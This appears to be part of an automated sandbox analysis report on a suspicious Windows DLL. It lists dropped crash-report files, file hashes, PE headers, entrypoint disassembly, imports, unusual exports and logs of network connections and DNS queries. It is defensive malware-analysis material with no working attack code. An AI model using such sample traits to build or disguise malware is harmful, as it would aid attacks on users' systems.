                                                                                                                        SHA-512:B03EA1DB6B58C4DFCD6BACEBC95BFD282F11D8BE9DF5F0ECF7F32F958898832D290CD6ED3B21D6D8A40C201D81B71625C0E6F27C670708CF7536212D02B6BAAB
                                                                                                                        Malicious:false
                                                                                                                        Preview: MDMP....... ........da...................U...........B..............GenuineIntelW...........T.......@...`.da!............................0..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER6984.tmp.WERInternalMetadata.xml
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):8416
                                                                                                                        Entropy (8bit):3.697753685979791
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:Rrl7r3GLNi926o6jYy6Yoy6xgmf8zSNz+prfZ89bYbasfyejm:RrlsNis6o6jYy6Y96xgmf8zSNpYb5fL6
                                                                                                                        MD5:BADE93E59CD5720AB99E2508033FE2BB
                                                                                                                        SHA1:9257D92BE814163ED9D6E71DC5F282D0377CD90D
                                                                                                                        SHA-256:E0576D35FA22FA6525FED18862A5C4D3FEF0A7DDA9ABA2DD711D994276920D3C
                                                                                                                        SHA-512:5A8B6AE760691632CBF5B4D45DC7E9DDBA241701D9C2D018A106BB338FCCA751E73FCF7FC789E9AD8C4745FA6D464E7050176AC96293F752BA48C24A4042FF07
                                                                                                                        Malicious:false
                                                                                                                        Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.6.4.<./.P.i.d.>.......
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER6E67.tmp.xml
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):4771
                                                                                                                        Entropy (8bit):4.486306505900062
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:cvIwSD8zsdNJgtWI9jZVWSC8B2Q8fm8M4JCdsTMFMDGv+q8vjsTv4SrSld:uITf9EqSN0tJNYvKivDWld
                                                                                                                        MD5:139252536DD735CAA02910CCEF45FF77
                                                                                                                        SHA1:B5EA76ED280C8826367FF09C33596FBD7E73E301
                                                                                                                        SHA-256:D78ACA3358C19DB67E52384ED6AEE82B755A321E0E5963312DBDE4B5DFD8C370
                                                                                                                        SHA-512:5BC27230DB2D3272AD98C0DFE3BB0BA29425ED587B6909065F635691F54F9B0A282092D6970FA70DD72D9A93ADAA3CD7691B1604ADD93176B25CCAEA6EF0EA19
                                                                                                                        Malicious:false
                                                                                                                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1205748" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                                                                        Static File Info

                                                                                                                        General

                                                                                                                        File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                        Entropy (8bit):6.669952151971332
                                                                                                                        TrID:
                                                                                                                        • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                        • DOS Executable Generic (2002/1) 0.20%
                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                        File name:616412739e268.dll
                                                                                                                        File size:718336
                                                                                                                        MD5:9e67e68ddbedba865b91b5469ab642ef
                                                                                                                        SHA1:f2c7b0735343081be06e48616d0fc14235a28744
                                                                                                                        SHA256:41c0934ba1be030dbae45893107f6a2ae5f99c79d7634626263cdf809f7556ee
                                                                                                                        SHA512:802d983ca7ca04ae737da69ed5772eece8f408c6c02c8d0c42cfea1c1abf25236b02c35c09d56f3ba6a229b3b71f72fa3d4c6735c8670c76affdbbc139b63d87
                                                                                                                        SSDEEP:12288:aUAQSxl6fDEr8Np6b/rPPsjosrS9aEoe+0JCym+4YJAOSVUNcuHIGF4uW/XrGAsV:az3xl6fq8Np6bTPPaBreaZlYCOSVol2a
                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m$aV.J2V.J2V.J2...2U.J2_t.2H.J2.cH3R.J2.cO3_.J2.cI3D.J2...2H.J2V.K2..J2.cO3).J2.cJ3W.J2.cJ3W.J2V..2W.J2.cH3W.J2RichV.J2.......

                                                                                                                        File Icon

                                                                                                                        Icon Hash:74f0e4ecccdce0e4

                                                                                                                        Static PE Info

                                                                                                                        General

                                                                                                                        Entrypoint:0x1003ab77
                                                                                                                        Entrypoint Section:.text
                                                                                                                        Digitally signed:false
                                                                                                                        Imagebase:0x10000000
                                                                                                                        Subsystem:windows gui
                                                                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                                        Time Stamp:0x5F700BB2 [Sun Sep 27 03:49:06 2020 UTC]
                                                                                                                        TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:6
                                                                                                                        OS Version Minor:0
                                                                                                                        File Version Major:6
                                                                                                                        File Version Minor:0
                                                                                                                        Subsystem Version Major:6
                                                                                                                        Subsystem Version Minor:0
                                                                                                                        Import Hash:b5c6badd398e2e3aa283a40a40432c6c

                                                                                                                        Entrypoint Preview

                                                                                                                        Instruction
                                                                                                                        push ebp
                                                                                                                        mov ebp, esp
                                                                                                                        cmp dword ptr [ebp+0Ch], 01h
                                                                                                                        jne 00007F9CC8990D67h
                                                                                                                        call 00007F9CC8991852h
                                                                                                                        push dword ptr [ebp+10h]
                                                                                                                        push dword ptr [ebp+0Ch]
                                                                                                                        push dword ptr [ebp+08h]
                                                                                                                        call 00007F9CC8990C0Ah
                                                                                                                        add esp, 0Ch
                                                                                                                        pop ebp
                                                                                                                        retn 000Ch
                                                                                                                        mov ecx, dword ptr [ebp-0Ch]
                                                                                                                        mov dword ptr fs:[00000000h], ecx
                                                                                                                        pop ecx
                                                                                                                        pop edi
                                                                                                                        pop edi
                                                                                                                        pop esi
                                                                                                                        pop ebx
                                                                                                                        mov esp, ebp
                                                                                                                        pop ebp
                                                                                                                        push ecx
                                                                                                                        ret
                                                                                                                        mov ecx, dword ptr [ebp-10h]
                                                                                                                        xor ecx, ebp
                                                                                                                        call 00007F9CC8990963h
                                                                                                                        jmp 00007F9CC8990D40h
                                                                                                                        mov ecx, dword ptr [ebp-14h]
                                                                                                                        xor ecx, ebp
                                                                                                                        call 00007F9CC8990952h
                                                                                                                        jmp 00007F9CC8990D2Fh
                                                                                                                        push eax
                                                                                                                        push dword ptr fs:[00000000h]
                                                                                                                        lea eax, dword ptr [esp+0Ch]
                                                                                                                        sub esp, dword ptr [esp+0Ch]
                                                                                                                        push ebx
                                                                                                                        push esi
                                                                                                                        push edi
                                                                                                                        mov dword ptr [eax], ebp
                                                                                                                        mov ebp, eax
                                                                                                                        mov eax, dword ptr [100AA0D4h]
                                                                                                                        xor eax, ebp
                                                                                                                        push eax
                                                                                                                        push dword ptr [ebp-04h]
                                                                                                                        mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                        lea eax, dword ptr [ebp-0Ch]
                                                                                                                        mov dword ptr fs:[00000000h], eax
                                                                                                                        ret
                                                                                                                        push eax
                                                                                                                        push dword ptr fs:[00000000h]
                                                                                                                        lea eax, dword ptr [esp+0Ch]
                                                                                                                        sub esp, dword ptr [esp+0Ch]
                                                                                                                        push ebx
                                                                                                                        push esi
                                                                                                                        push edi
                                                                                                                        mov dword ptr [eax], ebp
                                                                                                                        mov ebp, eax
                                                                                                                        mov eax, dword ptr [100AA0D4h]
                                                                                                                        xor eax, ebp
                                                                                                                        push eax
                                                                                                                        mov dword ptr [ebp-10h], eax
                                                                                                                        push dword ptr [ebp-04h]
                                                                                                                        mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                        lea eax, dword ptr [ebp-0Ch]
                                                                                                                        mov dword ptr fs:[00000000h], eax
                                                                                                                        ret
                                                                                                                        push eax
                                                                                                                        inc dword ptr fs:[eax]

                                                                                                                        Data Directories

                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0xa89900x80.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xa8a100x50.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1460000x53d0.reloc
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0xa474c0x54.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa47a00x40.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x7b0000x1fc.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                        Sections

                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                        .text0x10000x79f710x7a000False0.510071801358data6.75463290974IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                        .rdata0x7b0000x2e5860x2e600False0.556366871631data5.60181106954IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        .data0xaa0000x9b19c0x1800False0.190266927083data4.15778005426IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                        .reloc0x1460000x53d00x5400False0.752650669643data6.72453697464IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                        Imports

                                                                                                                        DLLImport
                                                                                                                        KERNEL32.dllLockResource, FreeLibrary, GetProcAddress, VirtualProtect, OpenProcess, GetCurrentThreadId, Sleep, GetSystemTime, CreateSemaphoreW, LoadLibraryW, GetModuleFileNameW, GetModuleHandleW, GetTempPathW, CreateFileW, GetVolumeInformationW, QueryPerformanceCounter, GetVersionExW, GetDateFormatW, OutputDebugStringW, CloseHandle, ReadConsoleW, ReadFile, GetConsoleMode, GetConsoleCP, WriteFile, FlushFileBuffers, HeapSize, SetStdHandle, SetFilePointerEx, GetFileSizeEx, GetProcessHeap, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, SetConsoleCtrlHandler, GetFileType, GetStdHandle, HeapReAlloc, HeapFree, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, EncodePointer, DecodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, WideCharToMultiByte, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, RaiseException, RtlUnwind, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, LoadLibraryExW, QueryPerformanceFrequency, ExitProcess, GetModuleHandleExW, GetCurrentThread, HeapAlloc, GetTimeZoneInformation, GetTimeFormatW, WriteConsoleW
                                                                                                                        USER32.dllCreateMenu, DeferWindowPos, BeginDeferWindowPos, UnregisterHotKey, TranslateMessage, RegisterWindowMessageW, GetPropW
                                                                                                                        MSACM32.dllacmDriverClose, acmFormatChooseW, acmFilterDetailsW, acmFilterEnumW, acmDriverEnum, acmDriverPriority, acmFormatEnumW, acmFilterTagEnumW, acmFormatTagDetailsW, acmDriverMessage, acmFormatSuggest, acmFilterTagDetailsW, acmFormatTagEnumW, acmFilterChooseW, acmDriverOpen, acmDriverDetailsW, acmFormatDetailsW, acmMetrics, acmDriverAddW, acmDriverRemove, acmDriverID, acmGetVersion

                                                                                                                        Exports

                                                                                                                        NameOrdinalAddress
                                                                                                                        BeGrass10x10016020
                                                                                                                        Fieldeight20x100162f0
                                                                                                                        Often30x10016510
                                                                                                                        Townenter40x100167a0

                                                                                                                        Network Behavior

                                                                                                                        Network Port Distribution

                                                                                                                        TCP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Oct 12, 2021 00:38:03.252177954 CEST49776443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:03.252216101 CEST4434977613.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:03.252338886 CEST49776443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:03.260545015 CEST49776443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:03.260579109 CEST4434977613.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:03.587343931 CEST4434977613.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:03.587502956 CEST49776443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:03.591922045 CEST49776443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:03.591939926 CEST4434977613.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:03.592248917 CEST4434977613.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:03.643688917 CEST49776443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:04.786664009 CEST49776443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:04.831147909 CEST4434977613.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:04.901016951 CEST4434977613.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:04.901099920 CEST4434977613.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:04.901241064 CEST49776443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:05.055090904 CEST49776443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:05.055150986 CEST4434977613.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:05.055206060 CEST49776443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:05.055217981 CEST4434977613.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:10.938795090 CEST49779443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:10.938858986 CEST4434977913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:10.939007044 CEST49779443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:10.944888115 CEST49779443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:10.944916010 CEST4434977913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:11.257594109 CEST4434977913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:11.257904053 CEST49779443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:11.262480021 CEST49779443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:11.262511015 CEST4434977913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:11.262924910 CEST4434977913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:11.316159964 CEST49779443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:11.595365047 CEST49779443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:11.639143944 CEST4434977913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:11.709975958 CEST4434977913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:11.710064888 CEST4434977913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:11.710170031 CEST49779443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:11.710742950 CEST49779443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:11.710772991 CEST4434977913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:11.710854053 CEST49779443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:38:11.710865021 CEST4434977913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:45.900778055 CEST49806443192.168.2.440.97.116.82
                                                                                                                        Oct 12, 2021 00:38:45.900826931 CEST4434980640.97.116.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:45.901609898 CEST49806443192.168.2.440.97.116.82
                                                                                                                        Oct 12, 2021 00:38:45.902388096 CEST49806443192.168.2.440.97.116.82
                                                                                                                        Oct 12, 2021 00:38:45.902405977 CEST4434980640.97.116.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.422904015 CEST4434980640.97.116.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.423059940 CEST49806443192.168.2.440.97.116.82
                                                                                                                        Oct 12, 2021 00:38:46.426368952 CEST49806443192.168.2.440.97.116.82
                                                                                                                        Oct 12, 2021 00:38:46.426393032 CEST4434980640.97.116.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.426701069 CEST4434980640.97.116.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.430068970 CEST49806443192.168.2.440.97.116.82
                                                                                                                        Oct 12, 2021 00:38:46.471141100 CEST4434980640.97.116.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.600647926 CEST4434980640.97.116.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.600722075 CEST4434980640.97.116.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.600783110 CEST49806443192.168.2.440.97.116.82
                                                                                                                        Oct 12, 2021 00:38:46.601516008 CEST49806443192.168.2.440.97.116.82
                                                                                                                        Oct 12, 2021 00:38:46.601542950 CEST4434980640.97.116.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.635039091 CEST49807443192.168.2.452.97.183.162
                                                                                                                        Oct 12, 2021 00:38:46.635082960 CEST4434980752.97.183.162192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.635184050 CEST49807443192.168.2.452.97.183.162
                                                                                                                        Oct 12, 2021 00:38:46.636074066 CEST49807443192.168.2.452.97.183.162
                                                                                                                        Oct 12, 2021 00:38:46.636096954 CEST4434980752.97.183.162192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.733916998 CEST4434980752.97.183.162192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.734044075 CEST49807443192.168.2.452.97.183.162
                                                                                                                        Oct 12, 2021 00:38:46.737009048 CEST49807443192.168.2.452.97.183.162
                                                                                                                        Oct 12, 2021 00:38:46.737025023 CEST4434980752.97.183.162192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.737360001 CEST4434980752.97.183.162192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.739736080 CEST49807443192.168.2.452.97.183.162
                                                                                                                        Oct 12, 2021 00:38:46.767653942 CEST4434980752.97.183.162192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.767720938 CEST4434980752.97.183.162192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.767815113 CEST49807443192.168.2.452.97.183.162
                                                                                                                        Oct 12, 2021 00:38:46.768023014 CEST49807443192.168.2.452.97.183.162
                                                                                                                        Oct 12, 2021 00:38:46.768037081 CEST4434980752.97.183.162192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.796379089 CEST49808443192.168.2.452.97.218.82
                                                                                                                        Oct 12, 2021 00:38:46.796427965 CEST4434980852.97.218.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.796536922 CEST49808443192.168.2.452.97.218.82
                                                                                                                        Oct 12, 2021 00:38:46.797328949 CEST49808443192.168.2.452.97.218.82
                                                                                                                        Oct 12, 2021 00:38:46.797353029 CEST4434980852.97.218.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.887511969 CEST4434980852.97.218.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.887612104 CEST49808443192.168.2.452.97.218.82
                                                                                                                        Oct 12, 2021 00:38:46.892256975 CEST49808443192.168.2.452.97.218.82
                                                                                                                        Oct 12, 2021 00:38:46.892277002 CEST4434980852.97.218.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.892529011 CEST4434980852.97.218.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.895700932 CEST49808443192.168.2.452.97.218.82
                                                                                                                        Oct 12, 2021 00:38:46.939138889 CEST4434980852.97.218.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.957782030 CEST4434980852.97.218.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.957911968 CEST4434980852.97.218.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.957983971 CEST49808443192.168.2.452.97.218.82
                                                                                                                        Oct 12, 2021 00:38:46.958444118 CEST49808443192.168.2.452.97.218.82
                                                                                                                        Oct 12, 2021 00:38:46.958467007 CEST4434980852.97.218.82192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:52.762846947 CEST49809443192.168.2.440.97.153.146
                                                                                                                        Oct 12, 2021 00:38:52.762887001 CEST4434980940.97.153.146192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:52.762998104 CEST49809443192.168.2.440.97.153.146
                                                                                                                        Oct 12, 2021 00:38:52.763700008 CEST49809443192.168.2.440.97.153.146
                                                                                                                        Oct 12, 2021 00:38:52.763951063 CEST4434980940.97.153.146192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.094397068 CEST4434980940.97.153.146192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.094536066 CEST49809443192.168.2.440.97.153.146
                                                                                                                        Oct 12, 2021 00:38:53.099283934 CEST49809443192.168.2.440.97.153.146
                                                                                                                        Oct 12, 2021 00:38:53.099319935 CEST4434980940.97.153.146192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.099530935 CEST4434980940.97.153.146192.168.2.4

                                                                                                                        UDP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Oct 12, 2021 00:38:03.208512068 CEST5585453192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:38:03.228565931 CEST53558548.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:05.070362091 CEST6454953192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:38:10.907257080 CEST5299153192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:38:10.925432920 CEST53529918.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:11.716469049 CEST5370053192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:38:25.800733089 CEST5653453192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:38:25.818322897 CEST53565348.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:32.527570009 CEST5662153192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:38:32.546330929 CEST53566218.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:45.880023956 CEST5504653192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:38:45.897805929 CEST53550468.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.614259958 CEST4961253192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:38:46.632378101 CEST53496128.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.775543928 CEST4928553192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:38:46.794441938 CEST53492858.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:52.743369102 CEST5060153192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:38:52.760597944 CEST53506018.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.220117092 CEST6087553192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:38:53.240650892 CEST53608758.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.397085905 CEST5644853192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:38:53.415934086 CEST53564488.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:07.148479939 CEST6242053192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:39:07.172518015 CEST53624208.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:13.816450119 CEST5018353192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:39:13.840886116 CEST53501838.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:27.242336988 CEST6153153192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:39:27.260047913 CEST53615318.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:27.719876051 CEST4922853192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:39:33.981678963 CEST5979453192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:39:34.002629995 CEST53597948.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:34.465598106 CEST5591653192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:39:48.098314047 CEST6054253192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:39:48.117002010 CEST53605428.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:55.946903944 CEST6068953192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:39:55.966435909 CEST53606898.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.155658960 CEST6420653192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:40:08.176791906 CEST53642068.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.626851082 CEST5090453192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:40:08.644534111 CEST53509048.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.775460958 CEST5752553192.168.2.48.8.8.8
